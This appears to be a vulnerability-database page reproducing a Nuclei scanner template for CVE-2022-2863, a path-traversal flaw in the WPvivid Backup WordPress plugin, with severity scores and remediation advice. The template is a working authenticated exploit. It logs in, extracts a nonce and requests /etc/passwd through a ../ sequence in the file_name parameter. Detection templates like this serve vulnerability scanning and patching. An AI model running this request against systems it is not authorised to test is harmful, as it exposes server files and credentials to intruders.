WordPress WPvivid Backup <0.9.76 - Local File Inclusion

2022-10-1908:26:08

ProjectDiscovery

github.com

wordpress

wpvivid

backup

vulnerability

local file inclusion

cve-2022-2863

wpscan

seclists

packetstorm

authenticated

4.9 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

0.352 Low

EPSS

Percentile

97.2%

JSON

WordPress WPvivid Backup version 0.9.76 is vulnerable to local file inclusion because the plugin does not sanitize and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server.

id: CVE-2022-2863

info:
  name: WordPress WPvivid Backup <0.9.76 - Local File Inclusion
  author: tehtbl
  severity: medium
  description: WordPress WPvivid Backup version 0.9.76 is vulnerable to local file inclusion because the plugin does not sanitize and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation.
  remediation: Upgrade to version 0.9.76 or later.
  reference:
    - https://seclists.org/fulldisclosure/2022/Oct/0
    - https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5
    - http://packetstormsecurity.com/files/168616/WordPress-WPvivid-Backup-Path-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2863
    - https://github.com/rodnt/rodnt
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 4.9
    cve-id: CVE-2022-2863
    cwe-id: CWE-22
    epss-score: 0.46632
    epss-percentile: 0.97438
    cpe: cpe:2.3:a:wpvivid:migration\,_backup\,_staging:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: wpvivid
    product: migration\,_backup\,_staging
    framework: wordpress
  tags: cve,cve2022,wp,wpscan,seclists,packetstorm,authenticated,lfi,wordpress,wp-plugin,wpvivid

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=WPvivid HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - '"_ajax_nonce":"([0-9a-z]+)"'
        internal: true
        part: body
# digest: 4a0a0047304502202b24f378b2c15e4a80c536ce9df05a94c3cabe81bb8e1eb19e344fcff19b3953022100f8e4e6c2e550b6fc7afb7c79ceae5d335310de4900ce7b2fb357c5ea265a0c6f:922c64590222798bb761d5b6d8e72950